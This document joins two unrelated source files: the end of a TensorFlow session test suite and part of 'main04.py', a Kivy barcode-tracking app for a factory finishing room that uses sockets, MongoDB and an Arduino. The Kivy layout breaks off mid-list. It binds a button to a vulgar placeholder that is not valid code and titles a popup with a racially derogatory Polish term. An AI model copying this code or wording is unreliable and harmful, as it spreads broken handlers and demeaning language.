# This test currently does not link in any GPU kernels,
# which is why placing this is invalid. If at some point
# GPU kernels are added to this test, some other different
# op / device combo should be chosen.
with ops.device('/gpu:0'):
a = constant_op.constant(1.0, shape=[1, 2])
b = constant_op.constant(1.0, shape=[1, 2])
# Only run the valid op, this should work.
b.eval()
with self.assertRaises(errors.InvalidArgumentError):
a.eval()
sess.close()
def testDefaultSessionPlacePrunedGraph(self):
sess = session.Session()
# Build a graph that has a bad op in it (no kernel).
#
# This test currently does not link in any GPU kernels,
# which is why placing this is invalid. If at some point
# GPU kernels are added to this test, some other different
# op / device combo should be chosen.
with ops.device('/gpu:0'):
_ = constant_op.constant(1.0, shape=[1, 2])
b = constant_op.constant(1.0, shape=[1, 2])
with self.assertRaises(errors.InvalidArgumentError):
# Even though we don't run the bad op, we place the entire
# graph, which should fail with a non-interactive session.
sess.run(b)
sess.close()
def testSharedGraph(self):
with ops.Graph().as_default() as g, ops.device('/cpu:0'):
a = constant_op.constant(1.0, shape=[1, 2])
b = constant_op.constant(2.0, shape=[2, 3])
c = math_ops.matmul(a, b)
with session.Session(graph=g) as sess1:
with session.Session(graph=g) as sess2:
self.assertAllEqual(sess1.run(c), sess2.run(c))
def testDuplicatedInputs(self):
with session.Session() as sess:
a = constant_op.constant(1.0, shape=[1, 2])
b = constant_op.constant(2.0, shape=[1, 3])
a_val, b_val, a2_val = sess.run([a, b, a])
self.assertAllEqual(a_val, [[1.0, 1.0]])
self.assertAllEqual(b_val, [[2.0, 2.0, 2.0]])
self.assertAllEqual(a2_val, [[1.0, 1.0]])
def testFeedAndFetch(self):
with session.Session() as sess:
for dtype in [dtypes.float16,
dtypes.float32,
dtypes.float64,
dtypes.int32,
dtypes.uint8,
dtypes.int16,
dtypes.int8,
dtypes.int64,
dtypes.bool,
dtypes.complex64,
dtypes.complex128]:
for shape in [(32, 4, 128), (37,), (2, 0, 6), (0, 0, 0)]:
np_dtype = dtype.as_numpy_dtype
feed_t = array_ops.placeholder(dtype=dtype, shape=shape)
out_t = array_ops.identity(feed_t)
np_array = np.random.randint(-10, 10, shape)
if dtype == dtypes.bool:
np_array = np_array > 0
elif dtype == dtypes.complex64:
np_array = np.sqrt(np_array.astype(np_dtype))
elif dtype == dtypes.complex64:
np_array = np.sqrt(np_array.astype(np_dtype))
else:
np_array = np_array.astype(np_dtype)
self.assertAllEqual(np_array,
sess.run(out_t, feed_dict={feed_t: np_array}))
# Check that we can also get the feed back.
self.assertAllEqual(np_array,
sess.run(feed_t, feed_dict={feed_t: np_array}))
# Also check that we can get both back.
out_v, feed_v = sess.run([out_t, feed_t],
feed_dict={feed_t: np_array})
self.assertAllEqual(np_array, out_v)
self.assertAllEqual(np_array, feed_v)
def testFeedError(self):
with session.Session() as sess:
feed_t = array_ops.placeholder(dtype=dtypes.float32)
out_t = array_ops.identity(feed_t)
feed_val = constant_op.constant(5.0)
with self.assertRaisesRegexp(TypeError, 'cannot be a tf.Tensor object'):
sess.run(out_t, feed_dict={feed_t: feed_val})
with self.assertRaisesRegexp(TypeError, 'cannot be a tf.Tensor object'):
out_t.eval(feed_dict={feed_t: feed_val})
with self.assertRaisesRegexp(TypeError, 'cannot be a tf.Tensor object'):
out_t.op.run(feed_dict={feed_t: feed_val})
def testFeedPrecisionLossError(self):
with session.Session() as sess:
largest_int64 = np.iinfo(np.int64).max
feed_int_implicit_int32 = constant_op.constant(1)
feed_int_explicit_int32 = constant_op.constant(1, dtype=dtypes.int32)
out_t = constant_op.constant(1.0)
with self.assertRaisesRegexp(TypeError,
'is not compatible with Tensor type'):
sess.run(out_t, feed_dict={feed_int_implicit_int32: largest_int64})
with self.assertRaisesRegexp(TypeError,
'is not compatible with Tensor type'):
sess.run(out_t, feed_dict={feed_int_explicit_int32: largest_int64})
def testStringFetch(self):
with session.Session():
for shape in [(32, 4, 128), (37,), (2, 0, 6), (0, 0, 0)]:
size = 1
for s in shape:
size *= s
c_list = np.array([compat.as_bytes(str(i)) for i in xrange(size)],
dtype=np.object).reshape(shape) if size > 0 else []
c = constant_op.constant(c_list)
self.assertAllEqual(c.eval(), c_list)
def testStringFeed(self):
with session.Session() as sess:
for shape in [(32, 4, 128), (37,), (2, 0, 6), (0, 0, 0)]:
size = 1
for s in shape:
size *= s
c_list = np.array([compat.as_bytes(str(i)) for i in xrange(size)],
dtype=np.object).reshape(shape)
feed_t = array_ops.placeholder(dtype=dtypes.string, shape=shape)
c = array_ops.identity(feed_t)
self.assertAllEqual(sess.run(c, feed_dict={feed_t: c_list}), c_list)
self.assertAllEqual(sess.run(feed_t, feed_dict={feed_t: c_list}),
c_list)
c_v, feed_v = sess.run([c, feed_t], feed_dict={feed_t: c_list})
self.assertAllEqual(c_v, c_list)
self.assertAllEqual(feed_v, c_list)
def testStringFeedWithNullCharacters(self):
with session.Session():
c_list = [b'\n\x01\x00', b'\n\x00\x01']
feed_t = array_ops.placeholder(dtype=dtypes.string, shape=[2])
c = array_ops.identity(feed_t)
out = c.eval(feed_dict={feed_t: c_list})
self.assertEqual(c_list[0], out[0])
self.assertEqual(c_list[1], out[1])
def testStringFeedWithUnicode(self):
with session.Session():
c_list = [u'\n\x01\x00', u'\n\x00\x01']
feed_t = array_ops.placeholder(dtype=dtypes.string, shape=[2])
c = array_ops.identity(feed_t)
out = c.eval(feed_dict={feed_t: c_list})
self.assertEqual(c_list[0], out[0].decode('utf-8'))
self.assertEqual(c_list[1], out[1].decode('utf-8'))
out = c.eval(feed_dict={feed_t: np.array(c_list, dtype=np.object)})
self.assertEqual(c_list[0], out[0].decode('utf-8'))
self.assertEqual(c_list[1], out[1].decode('utf-8'))
def testInvalidTargetFails(self):
with self.assertRaisesRegexp(
errors.NotFoundError,
'No session factory registered for the given session options'):
session.Session('INVALID_TARGET')
def testFetchByNameDifferentStringTypes(self):
with session.Session() as sess:
c = constant_op.constant(42.0, name='c')
d = constant_op.constant(43.0, name=u'd')
e = constant_op.constant(44.0, name=b'e')
f = constant_op.constant(45.0, name=r'f')
self.assertTrue(isinstance(c.name, six.text_type))
self.assertTrue(isinstance(d.name, six.text_type))
self.assertTrue(isinstance(e.name, six.text_type))
self.assertTrue(isinstance(f.name, six.text_type))
self.assertEqual(42.0, sess.run('c:0'))
self.assertEqual(42.0, sess.run(u'c:0'))
self.assertEqual(42.0, sess.run(b'c:0'))
self.assertEqual(42.0, sess.run(r'c:0'))
self.assertEqual(43.0, sess.run('d:0'))
self.assertEqual(43.0, sess.run(u'd:0'))
self.assertEqual(43.0, sess.run(b'd:0'))
self.assertEqual(43.0, sess.run(r'd:0'))
self.assertEqual(44.0, sess.run('e:0'))
self.assertEqual(44.0, sess.run(u'e:0'))
self.assertEqual(44.0, sess.run(b'e:0'))
self.assertEqual(44.0, sess.run(r'e:0'))
self.assertEqual(45.0, sess.run('f:0'))
self.assertEqual(45.0, sess.run(u'f:0'))
self.assertEqual(45.0, sess.run(b'f:0'))
self.assertEqual(45.0, sess.run(r'f:0'))
def testIncorrectGraph(self):
with ops.Graph().as_default() as g_1:
c_1 = constant_op.constant(1.0, name='c')
with ops.Graph().as_default() as g_2:
c_2 = constant_op.constant(2.0, name='c')
self.assertEqual('c', c_1.op.name)
self.assertEqual('c', c_2.op.name)
with session.Session(graph=g_1) as sess_1:
self.assertEqual(1.0, sess_1.run(c_1))
with self.assertRaises(ValueError):
sess_1.run(c_2)
with self.assertRaises(ValueError):
sess_1.run(c_2.op)
with session.Session(graph=g_2) as sess_2:
with self.assertRaises(ValueError):
sess_2.run(c_1)
with self.assertRaises(ValueError):
sess_2.run(c_1.op)
self.assertEqual(2.0, sess_2.run(c_2))
def testPartialRun(self):
with session.Session() as sess:
a = array_ops.placeholder(dtypes.float32, shape=[])
b = array_ops.placeholder(dtypes.float32, shape=[])
c = array_ops.placeholder(dtypes.float32, shape=[])
r1 = math_ops.add(a, b)
r2 = math_ops.mul(r1, c)
h = sess.partial_run_setup([r1, r2], [a, b, c])
res = sess.partial_run(h, r1, feed_dict={a: 1, b: 2})
self.assertEqual(3, res)
temp = res * 17
res = sess.partial_run(h, r2, feed_dict={c: temp})
self.assertEqual(153, res)
# Call again on the same graph.
h2 = sess.partial_run_setup([r1, r2], [a, b, c])
res = sess.partial_run(h2, r1, feed_dict={a: 1, b: 2})
self.assertEqual(3, res)
temp = res * 18
res = sess.partial_run(h2, r2, feed_dict={c: temp})
self.assertEqual(162, res)
def testPartialRunIncomplete(self):
with session.Session() as sess:
a = array_ops.placeholder(dtypes.float32, shape=[])
b = array_ops.placeholder(dtypes.float32, shape=[])
c = array_ops.placeholder(dtypes.float32, shape=[])
r1 = math_ops.add(a, b)
r2 = math_ops.mul(r1, c)
h = sess.partial_run_setup([r1, r2], [a, b, c])
res = sess.partial_run(h, r1, feed_dict={a: 1, b: 2})
self.assertEqual(3, res)
def testConcurrentPartialRun(self):
with session.Session() as sess:
a = array_ops.placeholder(dtypes.float32, shape=[])
b = array_ops.placeholder(dtypes.float32, shape=[])
c = array_ops.placeholder(dtypes.float32, shape=[])
r1 = math_ops.add(a, b)
r2 = math_ops.mul(r1, c)
h1 = sess.partial_run_setup([r1], [a, b, c])
h2 = sess.partial_run_setup([r1, r2], [a, b, c])
res = sess.partial_run(h1, r1, feed_dict={a: 1, b: 2})
self.assertEqual(3, res)
temp = res * 19
res = sess.partial_run(h2, r1, feed_dict={a: temp, b: 9})
self.assertEqual(66, res)
res = sess.partial_run(h2, r2, feed_dict={c: 7})
self.assertEqual(462, res)
def testManyPartialRun(self):
with session.Session() as sess:
steps = 200
inputs = []
outputs = []
a = constant_op.constant(2.0, dtypes.float32)
for i in xrange(steps):
inputs.append(array_ops.placeholder(dtypes.float32, shape=[]))
a = math_ops.mul(a, inputs[i])
outputs.append(a)
h = sess.partial_run_setup(outputs, inputs)
for i in xrange(steps):
res = sess.partial_run(h, outputs[i], feed_dict={inputs[i]: 1.0})
self.assertEqual(2.0, res)
feed_dict = {}
for i in xrange(steps):
feed_dict[inputs[i]] = 1.0
res = sess.run(outputs, feed_dict)
self.assertEqual(steps, len(res))
self.assertEqual(2.0, res[-1])
def testRunAndPartialRun(self):
with session.Session() as sess:
a = constant_op.constant(2.0, dtypes.float32)
b = a * 2
c = b * 3
r1 = sess.run([b, c])
h = sess.partial_run_setup([b, c], [])
r2 = sess.partial_run(h, [b, c])
self.assertEqual(r1, r2)
def testFeedDictKeyException(self):
with session.Session() as sess:
a = constant_op.constant(1.0, dtypes.float32, name='a')
with self.assertRaisesRegexp(TypeError, 'Cannot interpret feed_dict'):
sess.run(a, feed_dict={'a': [2.0]})
def testPerStepTrace(self):
run_options = config_pb2.RunOptions(
trace_level=config_pb2.RunOptions.FULL_TRACE)
run_metadata = config_pb2.RunMetadata()
with ops.device('/cpu:0'):
with session.Session() as sess:
sess.run(constant_op.constant(1.0))
self.assertTrue(not run_metadata.HasField('step_stats'))
sess.run(constant_op.constant(1.0), run_metadata=run_metadata)
self.assertTrue(not run_metadata.HasField('step_stats'))
sess.run(constant_op.constant(1.0),
options=run_options,
run_metadata=run_metadata)
self.assertTrue(run_metadata.HasField('step_stats'))
self.assertEquals(len(run_metadata.step_stats.dev_stats), 1)
def testRunOptionsRunMetadata(self):
run_options = config_pb2.RunOptions(
trace_level=config_pb2.RunOptions.FULL_TRACE)
run_metadata = config_pb2.RunMetadata()
with ops.device('/cpu:0'):
with session.Session() as sess:
# all combinations are valid
sess.run(constant_op.constant(1.0), options=None, run_metadata=None)
sess.run(constant_op.constant(1.0), options=None,
run_metadata=run_metadata)
self.assertTrue(not run_metadata.HasField('step_stats'))
sess.run(constant_op.constant(1.0), options=run_options,
run_metadata=None)
self.assertTrue(not run_metadata.HasField('step_stats'))
sess.run(constant_op.constant(1.0), options=run_options,
run_metadata=run_metadata)
self.assertTrue(run_metadata.HasField('step_stats'))
self.assertEquals(len(run_metadata.step_stats.dev_stats), 1)
def testFeedShapeCompatibility(self):
with session.Session() as sess:
some_tensor = constant_op.constant([2.0, 2.0, 2.0, 2.0])
new_shape = constant_op.constant([2, 2])
reshaped_tensor = array_ops.reshape(some_tensor, new_shape)
with self.assertRaisesRegexp(ValueError, 'Cannot feed value of shape'):
sess.run(reshaped_tensor, feed_dict={some_tensor: [1.0, 2.0, 3.0]})
with self.assertRaisesRegexp(ValueError, 'may not be fed'):
sess.run(reshaped_tensor, feed_dict={new_shape: [3, 7]})
def testInferShapesFalse(self):
with ops.Graph().as_default(), ops.device('/cpu:0'):
a = constant_op.constant([[1, 2]])
sess = session.Session()
self.assertFalse('_output_shapes' in sess.graph_def.node[0].attr)
# Avoid lint error regarding 'unused' var a.
self.assertTrue(a == a)
def testInferShapesTrue(self):
config = config_pb2.ConfigProto(
graph_options=config_pb2.GraphOptions(infer_shapes=True))
with ops.Graph().as_default(), ops.device('/cpu:0'):
a = constant_op.constant([[1, 2]])
sess = session.Session(config=config)
self.assertTrue('_output_shapes' in sess.graph_def.node[0].attr)
# Avoid lint error regarding 'unused' var a.
self.assertTrue(a == a)
def testBuildCostModel(self):
run_options = config_pb2.RunOptions()
config = config_pb2.ConfigProto(
allow_soft_placement=True,
graph_options=config_pb2.GraphOptions(build_cost_model=100))
with session.Session(config=config) as sess:
with ops.device('/gpu:0'):
a = array_ops.placeholder(dtypes.float32, shape=[])
b = math_ops.add(a, a)
c = array_ops.identity(b)
d = math_ops.mul(c, c)
for step in xrange(120):
run_metadata = config_pb2.RunMetadata()
sess.run(d, feed_dict={a: 1.0},
options=run_options, run_metadata=run_metadata)
if step == 99:
self.assertTrue(run_metadata.HasField('cost_graph'))
else:
self.assertFalse(run_metadata.HasField('cost_graph'))
def testNonInteractiveSessionNesting(self):
sess1 = session.Session()
sess1_controller = sess1.as_default()
sess1_controller.__enter__()
sess2 = session.Session()
sess2_controller = sess2.as_default()
sess2_controller.__enter__()
with self.assertRaisesRegexp(AssertionError, 'Nesting violated'):
sess1_controller.__exit__(None, None, None)
ops._default_session_stack.reset()
def testInteractiveSessionNesting(self):
sess1 = session.InteractiveSession()
sess2 = session.InteractiveSession()
del sess1
del sess2
def testInvalidArgument(self):
with self.assertRaisesRegexp(TypeError, 'target must be a string'):
session.Session(37)
with self.assertRaisesRegexp(TypeError, 'config must be a tf.ConfigProto'):
session.Session(config=37)
with self.assertRaisesRegexp(TypeError, 'graph must be a tf.Graph'):
session.Session(graph=37)
def testTimeoutWithShortOperations(self):
num_epochs = 5
q = data_flow_ops.FIFOQueue(
capacity=50, dtypes=[dtypes.int32], shapes=[()])
enqueue_op = q.enqueue_many(constant_op.constant([1, 2]))
# Use a 10-second timeout, which should be longer than any
# non-blocking enqueue_many op.
config = config_pb2.ConfigProto(operation_timeout_in_ms=10000)
with session.Session(config=config) as sess:
for _ in range(num_epochs):
sess.run(enqueue_op)
self.assertEqual(sess.run(q.size()), num_epochs * 2)
if __name__ == '__main__':
googletest.main()
|
main04.py | from kivy.app import App
from kivy.uix.image import Image
from kivy.uix.button import Button
from kivy.uix.label import Label
from kivy.core.text import Label as ButtonText
from kivy.uix.image import Image
from kivy.core.window import Window
from kivy.clock import Clock
from kivy.properties import NumericProperty
from kivy.uix.boxlayout import BoxLayout
from kivy.uix.gridlayout import GridLayout
from kivy.core.text import Label as CoreLabel
from kivy.uix.popup import Popup
from kivy.uix.screenmanager import ScreenManager, Screen
from kivy.lang import Builder
from kivy.clock import Clock
import math
import serial
import time
from pymongo import MongoClient
import datetime
import threading
import socket
time.sleep(5)
#host = '213.32.89.50'
host = '192.168.1.200'
port = 6646 # tu zmienic !!!
port2 = 6746 # tu zmienic !!!
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, port))
s.setblocking(0)
s.settimeout(0)
s2 = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s2.connect((host, port2))
s2.setblocking(0)
s2.settimeout(0)
print('connected to socket')
#client = MongoClient('mongodb://213.32.89.50:27017/')
client = MongoClient('mongodb://192.168.1.200:27017/')
print('conneted to mongodb')
db = client['production']
staff = db['staff']
second_category = db['nd2category']
comments = db['comments']
collection_00 = db['preparing']
collection_01 = db['pressing']
collection_02 = db['cutting']
collection_03 = db['sanding']
collection_04 = db['finishing']
collection_05 = db['stock']
collection_topress = db['topress']
collection_tocut = db['tocut']
collection_tosand = db['tosand']
collection_tofinish = db['tofinish']
collection_tostock = db['stock']
collection_evermade = db['evermade']
collection_missingcodes = db['missingcodes']
collection_workertime = db['workertime']
print('conneted to mongodb')
try:
MasterModule = serial.Serial('COM3', 115200)
except:
MasterModule = serial.Serial('/dev/ttyUSB0', 115200)
print('connected to arduino at: %s' % MasterModule.name)
time.sleep(1)
machine_state = 0
code = ["", "", "", "", "", "", "", "", "", ""]
code_win = ["", "", "", "", "", "", "", "", "", "","", "", "", "", "", "", "", "", "", ""]
label_list = ['barcode1', 'barcode2', 'barcode3', 'barcode4', 'barcode5', 'barcode6', 'barcode7', 'barcode8',
'barcode9', 'barcode10']
lis_window = ['cut00', 'cut01', 'cut02', 'cut03', 'cut04', 'cut05', 'cut06', 'cut07', 'cut08', 'cut09',
'cut10', 'cut11', 'cut12', 'cut13', 'cut14', 'cut15', 'cut16', 'cut17', 'cut18', 'cut19',
'cut20', 'cut21', 'cut22', 'cut23', 'cut24', 'cut25', 'cut26', 'cut27', 'cut28', 'cut29',
'cut30', 'cut31', 'cut32', 'cut33', 'cut34', 'cut35', 'cut36', 'cut37', 'cut38', 'cut39']
current_code = ""
current_time = ""
worker = ""
last_record = ""
b = 0
data = 0
send_zero = 0
read_code = ""
timestamp = ""
data_added = 0
comm_added = 0
comment_added = 0
sec = 0
com = 0
worker_time_start = ""
worker_time_stop = ""
code_tcp = ""
time_tcp = ""
message = ""
last_message = ""
Builder.load_string("""
<MainWindow>:
BoxLayout:
canvas.before:
Color:
rgba: 1,1,1, .80
Rectangle:
pos: root.pos
size: root.size
orientation: 'vertical'
color: (1,1,1,0)
orientation: 'vertical'
BoxLayout:
orientation: 'vertical'
BoxLayout:
canvas.before:
Color:
rgba: 0,0,0, 0.75
Rectangle:
pos: self.pos
size: self.size
orientation: 'horizontal'
size_hint: 1, .18
Label:
text: '[b]FINISH ROOM - 04[b]' # tu zmienic !!!
markup: 'True'
font_size: self.parent.width/20
Label:
size_hint: 0.3 , 1
Image:
source: 'logo.png'
size_hint: 0.5 , 1
Label:
size_hint: .1, 1
BoxLayout:
orientation: 'horizontal'
BoxLayout:
orientation: 'vertical'
size_hint: .9, 1
Label:
size_hint: 1, 0.4
Label:
text: '[b]SCANNED BARCODES[b]'
markup: 'True'
size_hint: 1, 1.2
font_size: self.parent.width/13
color: 0, .6156, .48235
Label:
size_hint: 1, 0.2
Label:
id: barcode1
text: ''
color: 0, 0, 0, 1
font_size: self.parent.width/19
Label:
id: barcode2
text: ''
color: 0, 0, 0, 0.95
font_size: self.parent.width/19
Label:
id: barcode3
text: ''
color: 0, 0, 0, 0.9
font_size: self.parent.width/19
Label:
id: barcode4
text: ''
color: 0, 0, 0, 0.85
font_size: self.parent.width/19
Label:
id: barcode5
text: ''
color: 0, 0, 0, 0.8
font_size: self.parent.width/19
Label:
id: barcode6
text: ''
color: 0, 0, 0, 0.75
font_size: self.parent.width/19
Label:
id: barcode7
text: ''
color: 0, 0, 0, 0.7
font_size: self.parent.width/19
Label:
id: barcode8
text: ''
color: 0, 0, 0, 0.65
font_size: self.parent.width/19
Label:
id: barcode9
text: ''
color: 0, 0, 0, 0.6
font_size: self.parent.width/19
Label:
id: barcode10
text: ''
color: 0, 0, 0, 0.55
font_size: self.parent.width/19
Label:
size_hint: 1, 0.5
Label:
size_hint: 0.01 , 1
BoxLayout:
orientation: 'vertical'
Label:
size_hint: 1, 0.7
Label:
id: last_code
text: '[b]-[b]'
markup: 'True'
color: 1,0,0, .5
font_size: self.parent.width/10
size_hint: 1 , .6
Label:
id: last_code_time
text: '[b]-[b]'
markup: 'True'
color: 1,0,0,.6
font_size: self.parent.width/10
size_hint: 1, 0.5
size_hint: 1 , .6
Label:
id: status
text: '[b]DISCONNECT[b]'
markup: 'True'
color: 0,0,0,.7
font_size: self.parent.width/12
halign: 'center'
valign: 'middle'
size_hint: 1 , .6
Label:
id: worker_label
text: '-'
font_size: self.parent.width/13
color: 0, .6156, .48235, 1
halign: 'center'
valign: 'middle'
size_hint: 1 , .6
Label:
size_hint: 1, .2
BoxLayout:
BoxLayout:
orientation: 'vertical'
size_hint: 1.2 ,1.1
Label:
size_hint: 1, 0.4
BoxLayout:
orientation: 'horizontal'
Label:
size_hint: .05 , 1
Button:
text: 'ADD COMMENTS'
font_size: self.parent.width/26
text_size: self.parent.width/4 , None
halign: 'center'
valign: 'middle'
background_color: 0, .6156, .48235
background_color: 0, .6156, .48235, 1
background_normal: ''
on_press: root.addcoment()
Label:
size_hint: .1 , 1
Button:
text: 'ADD 2nd CATEGORY'
font_size: self.parent.width/26
text_size: self.parent.width/5, None
halign: 'center'
valign: 'middle'
background_color: 0, .6156, .48235, 1
background_normal: ''
on_press: root.nd2category()
Label:
size_hint: .1 , 1
Button:
text: 'STOCK'
font_size: self.parent.width/26
background_color: 0, .6156, .48235, 1
background_normal: ''
on_press: root.show_info() # tu zmienic tylko dla 00
Label:
size_hint: .1 , 1
Button:
text: 'EXIT'
font_size: self.parent.width/26
text_size: self.parent.width/5, None
halign: 'center'
valign: 'middle'
background_color: 0, .6156, .48235, 1
background_normal: ''
on_press: dupa
Label:
size_hint: .05 , 1
Label:
text: 'COMMENT'
color: 0,0,0,1
size_hint: 1, 0.3
TextInput:
id: comment
size_hint: 1 , 0.6
Label:
size_hint: 1, 0.3
Label:
size_hint: .03, 1
<MessageWindow>:
size_hint: 0.5, 0.5
title_align: 'center'
title: 'WIADOMOSC DLA PANA MURZYNA'
BoxLayout:
Label:
id: messagetext
<InfoWindow>:
on_open: root.popup_count()
size_hint: 0.8, 0.8
title_align: 'center'
title: 'BOARDS TO FINISH' #tu zmienic
BoxLayout:
orientation: 'horizontal'
BoxLayout:
orientation: 'vertical'
Label:
text: root.board_name_list[0]
size_hint: 1.5 , 1
text_size: self.width, self.height
font_size: self.parent.width/root.board_name_text_scale
halign: 'left'
valign: 'middle'
Label:
text: root.board_name_list[1]
size_hint: 1.5 , 1
text_size: self.width, self.height
font_size: self.parent.width/root.board_name_text_scale
halign: 'left'
valign: 'middle'
Label:
text: root.board_name_list[2]
size_hint: 1.5 , 1
text_size: self.width, self.height
font_size: self.parent.width/root.board_name_text_scale
halign: 'left'
valign: 'middle'
Label:
text: root.board_name_list[3]
size_hint: 1.5 , 1
text_size: self.width, self.height
font_size: self.parent.width/root.board_name_text_scale
halign: 'left'
valign: 'middle'
Label:
text: root.board_name_list[4]
size_hint: 1.5 , 1
text_size: self.width, self.height
font_size: self.parent.width/root.board_name_text_scale
halign: 'left'
valign: 'middle'
Label:
text: root.board_name_list[5]
size_hint: 1.5 , 1
text_size: self.width, self.height
font_size: self.parent.width/root.board_name_text_scale
halign: 'left'
valign: 'middle'
Label:
text: root.board_name_list[6]
size_hint: 1.5 , 1
text_size: self.width, self.height
font_size: self.parent.width/root.board_name_text_scale
halign: 'left'
valign: 'middle'
Label:
text: root.board_name_list[7]
size_hint: 1.5 , 1
text_size: self.width, self.height
font_size: self.parent.width/root.board_name_text_scale
halign: 'left'
valign: 'middle'
Label:
text: root.board_name_list[8]
size_hint: 1.5 , 1
text_size: self.width, self.height
font_size: self.parent.width/root.board_name_text_scale
halign: 'left'
valign: 'middle'
Label:
text: root.board_name_list[9]
size_hint: 1.5 , 1
text_size: self.width, self.height
font_size: self.parent.width/root.board_name_text_scale
halign: 'left'
valign: 'middle'
BoxLayout:
orientation: 'vertical'
Label:
id: cut00
text: '0'
color: 1,0,0,1
Label:
id: cut01
text: '0'
color: 1,0,0,1
Label:
id: cut02
text: '0'
color: 1,0,0,1
Label:
id: cut03
text: '0'
color: 1,0,0,1
Label:
id: cut04
text: '0'
color: 1,0,0,1
Label:
id: cut05
text: '0'
color: 1,0,0,1
Label:
id: cut06
text: '0'
color: 1,0,0,1
Label:
id: cut07
text: '0'
color: 1,0,0,1
Label:
id: cut08
text: '0'
color: 1,0,0,1
Label:
id: cut09
text: '0'
color: 1,0,0,1
BoxLayout:
orientation: 'vertical'
Label:
text: root.board_name_list[10]
size_hint: 1.5 , 1
text_size: self.width, self.height
font_size: self.parent.width/root.board_name_text_scale
halign: 'left'
valign: 'middle'
Label:
text: root.board_name_list[11]
size_hint: 1.5 , 1
text_size: self.width, self.height
font_size: self.parent.width/root.board_name_text_scale
halign: 'left'
valign: 'middle'
Label:
text: root.board_name_list[12]
size_hint: 1.5 , 1
text_size: self.width, self.height
font_size: self.parent.width/root.board_name_text_scale
halign: 'left'
valign: 'middle'
Label:
text: root.board_name_list[13]
size_hint: 1.5 , 1
text_size: self.width, self.height
font_size: self.parent.width/root.board_name_text_scale
halign: 'left'
valign: 'middle'
Label:
text: root.board_name_list[14]
size_hint: 1.5 , 1
text_size: self.width, self.height
font_size: self.parent.width/root.board_name_text_scale
halign: 'left'
valign: 'middle'
Label:
text: root.board_name_list[15]
size_hint: 1.5 , 1
text_size: self.width, self.height
font_size: self.parent.width/root.board_name_text_scale
halign: 'left'
valign: 'middle'
Label:
text: root.board_name_list[16]
size_hint: 1.5 , 1
text_size: self.width, self.height
font_size: self.parent.width/root.board_name_text_scale
halign: 'left'
valign: 'middle'
Label:
text: root.board_name_list[17]
size_hint: 1.5 , 1
text_size: self.width, self.height
font_size: self.parent.width/root.board_name_text_scale
halign: 'left'
valign: 'middle'
Label:
text: root.board_name_list[18]
size_hint: 1.5 , 1
text_size: self.width, self.height
font_size: self.parent.width/root.board_name_text_scale
halign: 'left'
valign: 'middle'
Label:
text: root.board_name_list[19]
size_hint: 1.5 , 1
text_size: self.width, self.height
font_size: self.parent.width/root.board_name_text_scale
halign: 'left'
valign: 'middle'
BoxLayout:
orientation: 'vertical'
Label:
id: cut10
text: '0'
color: 1,0,0,1
Label:
id: cut11
text: '0'
color: 1,0,0,1
Label:
id: cut12
text: '0'
color: 1,0,0,1
Label:
id: cut13
text: '0'
color: 1,0,0,1
Label:
id: cut14
text: '0'
color: 1,0,0,1
Label:
id: cut15
text: '0'
color: 1,0,0,1
Label:
id: cut16
text: '0'
color: 1,0,0,1
Label:
id: cut17
text: '0'
color: 1,0,0,1
Label:
id: cut18
text: '0'
color: 1,0,0,1
Label:
id: cut19
text: '0'
color: 1,0,0,1
BoxLayout:
orientation: 'vertical'
Label:
text: root.board_name_list[20]
size_hint: 1.5 , 1
text_size: self.width, self.height
font_size: self.parent.width/root.board_name_text_scale
halign: 'left'
valign: 'middle'
Label:
text: root.board_name_list[21]
size_hint: 1.5 , 1
text_size: self.width, self.height
font_size: self.parent.width/root.board_name_text_scale
halign: 'left'
valign: 'middle'
Label:
text: root.board_name_list[22]
size_hint: 1.5 , 1
text_size: self.width, self.height
font_size: self.parent.width/root.board_name_text_scale
halign: 'left'
valign: 'middle'
Label:
text: root.board_name_list[23]
size_hint: 1.5 , 1
text_size: self.width, self.height
font_size: self.parent.width/root.board_name_text_scale
halign: 'left'
valign: 'middle'
Label:
text: root.board_name_list[24]
size_hint: 1.5 , 1
text_size: self.width, self.height
font_size: self.parent.width/root.board_name_text_scale
halign: 'left'
valign: 'middle'
Label:
text: root.board_name_list[25]
size_hint: 1.5 , 1
text_size: self.width, self.height
font_size: self.parent.width/root.board_name_text_scale
halign: 'left'
valign: 'middle'
Label:
text: root.board_name_list[26]
size_hint: 1.5 , 1
text_size: self.width, self.height
font_size: self.parent.width/root.board_name_text_scale
halign: 'left'
valign: 'middle'
Label:
text: root.board_name_list[27]
size_hint: 1.5 , 1
text_size: self.width, self.height
font_size: self.parent.width/root.board_name_text_scale
halign: 'left'
valign: 'middle'
Label:
text: root.board_name_list[28]
size_hint: 1.5 , 1
text_size: self.width, self.height
font_size: self.parent.width/root.board_name_text_scale
halign: 'left'
valign: 'middle'
Label:
text: root.board_name_list[29]
size_hint: 1.5 , 1
text_size: self.width, self.height
font_size: self.parent.width/root.board_name_text_scale
halign: 'left'
valign: 'middle'
BoxLayout:
orientation: 'vertical'
Label:
id: cut20
text: '0'
color: 1,0,0,1
Label:
id: cut21
text: '0'
color: 1,0,0,1
Label:
id: cut22
text: '0'
color: 1,0,0,1
Label:
id: cut23
text: '0'
color: 1,0,0,1
Label:
id: cut24
text: '0'
color: 1,0,0,1
Label:
id: cut25
text: '0'
color: 1,0,0,1
Label:
id: cut26
text: '0'
color: 1,0,0,1
Label:
id: cut27
text: '0'
color: 1,0,0,1
Label:
id: cut28
text: '0'
color: 1,0,0,1
Label:
id: cut29
text: '0'
color: 1,0,0,1
BoxLayout:
orientation: 'vertical'
Label:
text: root.board_name_list[30]
size_hint: 1.5 , 1
text_size: self.width, self.height
font_size: self.parent.width/root.board_name_text_scale
halign: 'left'
valign: 'middle'
Label:
text: root.board_name_list[31]
size_hint: 1.5 , 1
text_size: self.width, self.height
font_size: self.parent.width/root.board_name_text_scale
halign: 'left'
valign: 'middle'
Label:
text: root.board_name_list[32]
size_hint: 1.5 , 1
text_size: self.width, self.height
font_size: self.parent.width/root.board_name_text_scale
halign: 'left'
valign: 'middle'
Label:
text: root.board_name_list[33]
size_hint: 1.5 , 1
text_size: self.width, self.height
font_size: self.parent.width/root.board_name_text_scale
halign: 'left'
valign: 'middle'
Label:
text: root.board_name_list[34]
size_hint: 1.5 , 1
text_size: self.width, self.height
font_size: self.parent.width/root.board_name_text_scale
halign: 'left'
valign: 'middle'
Label:
text: root.board_name_list[35]
size_hint: 1.5 , 1
text_size: self.width, self.height
font_size: self.parent.width/root.board_name_text_scale
halign: 'left'
valign: 'middle'
Label:
text: root.board_name_list[36]
